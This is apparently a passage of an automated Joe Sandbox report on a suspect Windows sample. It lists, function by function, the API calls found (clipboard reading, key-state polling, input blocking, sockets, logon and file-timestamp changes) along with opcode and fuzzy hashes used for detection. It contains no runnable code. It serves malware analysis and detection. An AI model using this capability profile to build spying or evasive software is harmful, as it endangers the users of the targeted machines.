                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNextSleep_wcslen
                        • String ID: *.*
                        • API String ID: 2693929171-438819550
                        • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                        • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                        • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                        • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046C635
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                        • GetClipboardData.USER32 ref: 0046C64F
                        • CloseClipboard.USER32 ref: 0046C65D
                        • GlobalLock.KERNEL32(00000000), ref: 0046C688
                        • CloseClipboard.USER32 ref: 0046C692
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                        • GetClipboardData.USER32 ref: 0046C6DD
                        • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                        • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                        • CloseClipboard.USER32 ref: 0046C866
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                        • String ID: HH
                        • API String ID: 589737431-2761332787
                        • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                        • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                        • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                        • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                        APIs
                        • __wcsicoll.LIBCMT ref: 0043643C
                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                        • __wcsicoll.LIBCMT ref: 00436466
                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicollmouse_event
                        • String ID: DOWN
                        • API String ID: 1033544147-711622031
                        • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                        • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                        • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                        • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                        APIs
                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                        • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLastinet_addrsocket
                        • String ID:
                        • API String ID: 4170576061-0
                        • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                        • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                        • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                        • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                        APIs
                        • GetCursorPos.USER32(004A83D8), ref: 0045636A
                        • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                        • GetAsyncKeyState.USER32 ref: 004563D0
                        • GetAsyncKeyState.USER32 ref: 004563DC
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorLongScreenWindow
                        • String ID:
                        • API String ID: 3539004672-0
                        • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                        • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                        • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                        • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                        APIs
                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                        • IsWindowVisible.USER32 ref: 00477314
                        • IsWindowEnabled.USER32 ref: 00477324
                        • GetForegroundWindow.USER32 ref: 00477331
                        • IsIconic.USER32 ref: 0047733F
                        • IsZoomed.USER32 ref: 0047734D
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                        • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                        • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                        • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                        APIs
                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                        • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                        • CloseHandle.KERNEL32(00000000), ref: 00436D93
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                        • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                        • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                        • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU
                        • API String ID: 0-2165971703
                        • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                        • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                        • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                        • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                        • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                        • Opcode Fuzzy Hash: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                        • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                        APIs
                        • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                        • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                        • FindClose.KERNEL32(00000000), ref: 00436B13
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                        • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                        • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                        • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                        APIs
                        • __time64.LIBCMT ref: 004433A2
                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Time$FileSystem__aulldiv__time64
                        • String ID: rJ
                        • API String ID: 2893107130-1865492326
                        • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                        • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                        • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                        • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                        APIs
                        • __time64.LIBCMT ref: 004433A2
                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Time$FileSystem__aulldiv__time64
                        • String ID: rJ
                        • API String ID: 2893107130-1865492326
                        • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                        • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                        • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                        • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                        • FindClose.KERNEL32(00000000), ref: 0045DDDD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                        • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                        • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                        • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0vH$HH
                        • API String ID: 0-728391547
                        • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                        • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                        • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                        • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _memset
                        • String ID:
                        • API String ID: 2102423945-0
                        • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                        • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                        • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                        • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                        APIs
                        • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Proc
                        • String ID:
                        • API String ID: 2346855178-0
                        • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                        • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                        • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                        • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                        • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                        • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                        • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                        APIs
                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                        • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                        • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                        • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                        • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                        • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                        • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00422033
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                        • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                        • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                        • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                        Memory Dump Source
